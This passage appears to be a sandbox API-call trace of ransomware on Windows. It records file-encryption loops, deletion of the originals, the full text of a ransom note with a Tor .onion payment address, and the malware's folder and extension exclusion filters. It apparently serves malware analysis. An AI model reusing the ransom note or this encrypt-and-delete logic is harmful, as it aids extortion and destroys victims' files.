(in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.802] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.802] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.802] GetLastError () returned 0x0 [0166.802] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.803] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.803] GetLastError () returned 0x0 [0166.803] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.803] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.804] GetLastError () returned 0x0 [0166.804] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.804] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.804] GetLastError () returned 0x0 [0166.804] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.804] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x98, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x98, lpOverlapped=0x0) returned 1 [0166.804] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x98, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xa0) returned 1 [0166.804] GetLastError () returned 0x0 [0166.804] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xa0, lpOverlapped=0x0) returned 1 [0166.804] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.804] WriteFile (in: hFile=0x15c4, lpBuffer=0x2892040*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 0x20 [0166.804] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", dwFileAttributes=0x20) returned 1 [0166.805] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 1 [0166.805] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 1 [0166.805] CryptDestroyKey (hKey=0x9ad438) returned 1 [0166.805] wcslen (_String="OK") returned 0x2 [0166.805] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.805] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.805] CryptDestroyKey (hKey=0x9ad238) returned 1 [0166.806] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0166.806] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0166.806] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.806] GetLastError () returned 0x12 [0166.806] FindClose (in: hFindFile=0x9ad6b8 | out: hFindFile=0x9ad6b8) returned 1 [0166.806] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0166.807] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.807] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.808] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.808] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.808] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.808] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.808] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.808] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.808] wcslen (_String="\\\\?\\") returned 0x4 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.exe") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.dll") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.lnk") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.bat") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.ini") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.msi") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*.scf") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*pagefile.sys*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*AppData*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\winrar\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\java\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\windows\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\ESET\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\AVG\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*Atheros*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*Realtek*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*bootmgr*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*boot*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*boot*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.808] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*IO.SYS*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*ntldr*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*chrome*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*opera*") returned 0 [0166.809] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", pszSpec="*firefox*") returned 0 [0166.809] wcslen (_String="\\\\?\\") returned 0x4 [0166.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad3b8 [0166.813] wcscmp (_String1=".", _String2=".") returned 0 [0166.813] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.813] wcscmp (_String1="..", _String2=".") returned 1 [0166.813] wcscmp (_String1="..", _String2="..") returned 0 [0166.813] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.813] wcscmp (_String1="1033", _String2=".") returned 1 [0166.813] wcscmp (_String1="1033", _String2="..") returned 1 [0166.813] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.814] PathMatchSpecW (pszFile="VSTOInstaller.exe", pszSpec="*NMCRYPT") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOInstaller.exe", pszSpec="*Recovers your files.html") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOInstaller.exe", pszSpec="*.exe") returned 1 [0166.814] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.814] PathMatchSpecW (pszFile="VSTOLoader.dll", pszSpec="*NMCRYPT") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOLoader.dll", pszSpec="*Recovers your files.html") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOLoader.dll", pszSpec="*.exe") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOLoader.dll", pszSpec="*.dll") returned 1 [0166.814] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.814] PathMatchSpecW (pszFile="VSTOMessageProvider.dll", pszSpec="*NMCRYPT") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOMessageProvider.dll", pszSpec="*Recovers your files.html") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOMessageProvider.dll", pszSpec="*.exe") returned 0 [0166.814] PathMatchSpecW (pszFile="VSTOMessageProvider.dll", pszSpec="*.dll") returned 1 [0166.814] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0166.814] GetLastError () returned 0x12 [0166.814] FindClose (in: hFindFile=0x9ad3b8 | out: hFindFile=0x9ad3b8) returned 1 [0166.814] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.814] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.814] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.814] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.814] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.814] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.814] wcslen (_String="\\\\?\\") returned 0x4 [0166.814] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.exe") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.dll") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.lnk") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.bat") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.ini") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.msi") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*.scf") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*pagefile.sys*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*AppData*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\winrar\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\java\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\windows\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\ESET\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\AVG\\*") returned 0 [0166.815] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.815] PathMatchSpecW 